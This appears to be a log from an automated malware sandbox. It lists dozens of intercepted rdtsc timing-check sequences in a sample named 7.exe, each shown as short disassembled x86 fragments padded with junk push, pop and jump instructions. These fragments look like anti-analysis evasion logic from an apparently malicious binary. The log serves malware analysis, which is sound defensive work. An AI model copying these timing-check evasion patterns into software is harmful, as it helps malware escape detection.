Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC348D second address: EC349C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FDB98EAF3C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC39DD second address: EC39F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EABA30h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC39F5 second address: EC39FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC39FA second address: EC3A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDB98EABA32h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC3A12 second address: EC3A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FDB98EAF3C6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC3A23 second address: EC3A33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC3A33 second address: EC3A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC3A37 second address: EC3A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC3E22 second address: EC3E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC3E26 second address: EC3E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jg 00007FDB98EABA26h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC3E3A second address: EC3E53 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDB98EAF3D2h 0x00000008 jno 00007FDB98EAF3C6h 0x0000000e jo 00007FDB98EAF3C6h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC9D45 second address: EC9D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC9D49 second address: EC9D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC9D4F second address: EC9D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA32h 0x00000007 pushad 0x00000008 jg 00007FDB98EABA26h 0x0000000e ja 00007FDB98EABA26h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 jg 00007FDB98EABA26h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FDB98EABA2Ch 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC9EB7 second address: EC9EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECA00D second address: ECA012 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECA012 second address: ECA018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECA5D3 second address: ECA5F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDB98EABA30h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECA5F6 second address: ECA5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECA5FA second address: ECA5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECA5FE second address: ECA60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FDB98EAF3C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECA75B second address: ECA761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ECAEBD second address: ECAEC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC94EC second address: EC94F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDB98EABA26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC94F6 second address: EC9507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FDB98EAF3C6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: ED9034 second address: ED9040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007FDB98EABA26h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EE5094 second address: EE509C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EE509C second address: EE50A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EE50A0 second address: EE50BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jng 00007FDB98EAF3E6h 0x0000000f jmp 00007FDB98EAF3CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EE50BF second address: EE50C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EE9ECB second address: EE9EE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDB98EAF3CBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EEF7F9 second address: EEF7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F02ACA second address: F02AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FDB98EAF3D9h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01272 second address: F01278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01278 second address: F0128A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDB98EAF3C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F0128A second address: F0128E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F0128E second address: F01292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01292 second address: F01298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01298 second address: F012A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F012A4 second address: F012B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007FDB98EABA32h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F012B1 second address: F012B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F012B7 second address: F012BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F0181A second address: F0184D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 jmp 00007FDB98EAF3D4h 0x0000000d pop ebx 0x0000000e push eax 0x0000000f jnc 00007FDB98EAF3C6h 0x00000015 jl 00007FDB98EAF3C6h 0x0000001b pop eax 0x0000001c popad 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F0184D second address: F01851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F019A7 second address: F019BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F019BF second address: F019F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FDB98EABA42h 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 push edx 0x00000018 jmp 00007FDB98EABA2Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01B2C second address: F01B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FDB98EAF3D4h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01B49 second address: F01B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01B4E second address: F01B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FDB98EAF3D1h 0x0000000b popad 0x0000000c jnc 00007FDB98EAF3E4h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01B90 second address: F01B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDB98EABA26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F01B9C second address: F01BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDB98EAF3D7h 0x0000000b js 00007FDB98EAF3C6h 0x00000011 jnp 00007FDB98EAF3C6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a jnp 00007FDB98EAF3CAh 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jng 00007FDB98EAF3C6h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F027BE second address: F027C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F027C4 second address: F027CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F027CA second address: F027D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F17741 second address: F17761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FDB98EAF3C6h 0x0000000f jnl 00007FDB98EAF3C6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F25846 second address: F25852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDB98EABA26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F2559B second address: F255A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3C4A7 second address: F3C4BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Eh 0x00000007 jnp 00007FDB98EABA2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3C4BF second address: F3C4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FDB98EAF3CEh 0x0000000d jng 00007FDB98EAF3C6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F40CB5 second address: F40CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3FC82 second address: F3FC9C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDB98EAF3C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FDB98EAF3C6h 0x00000014 jp 00007FDB98EAF3C6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3FC9C second address: F3FCAC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDB98EABA26h 0x00000008 jl 00007FDB98EABA26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3FCAC second address: F3FCB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3FFC2 second address: F3FFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3FFC8 second address: F3FFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F3FFD1 second address: F3FFDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FDB98EABA26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F40849 second address: F4087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jmp 00007FDB98EAF3D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F4087B second address: F4087F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F4087F second address: F40895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F409E7 second address: F40A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FDB98EABA26h 0x0000000d jng 00007FDB98EABA26h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jp 00007FDB98EABA2Ch 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jng 00007FDB98EABA26h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push ecx 0x0000002b jmp 00007FDB98EABA2Bh 0x00000030 pop ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jnc 00007FDB98EABA26h 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F42330 second address: F42351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDB98EAF3C6h 0x0000000a jmp 00007FDB98EAF3D0h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F46463 second address: F46467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F46587 second address: F465B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDB98EAF3C6h 0x0000000a popad 0x0000000b jnc 00007FDB98EAF3C8h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDB98EAF3D7h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F465B7 second address: F465C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F465C9 second address: F465CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F4667A second address: F46680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F46680 second address: F466A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDB98EAF3D4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F466A3 second address: F466EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FDB98EABA26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor dx, 53A9h 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FDB98EABA28h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e sub dx, A891h 0x00000033 call 00007FDB98EABA29h 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F466EB second address: F46711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EAF3D9h 0x00000009 popad 0x0000000a je 00007FDB98EAF3CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F48144 second address: F48149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F49BA9 second address: F49BE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDB98EAF3D8h 0x0000000e jmp 00007FDB98EAF3D1h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: F49BE7 second address: F49BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0B72 second address: 55C0B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0B76 second address: 55C0B92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0B92 second address: 55C0BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDB98EAF3D6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDB98EAF3CAh 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0BC8 second address: 55C0BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B3A second address: 5600B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B3E second address: 5600B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B42 second address: 5600B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B48 second address: 5600B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
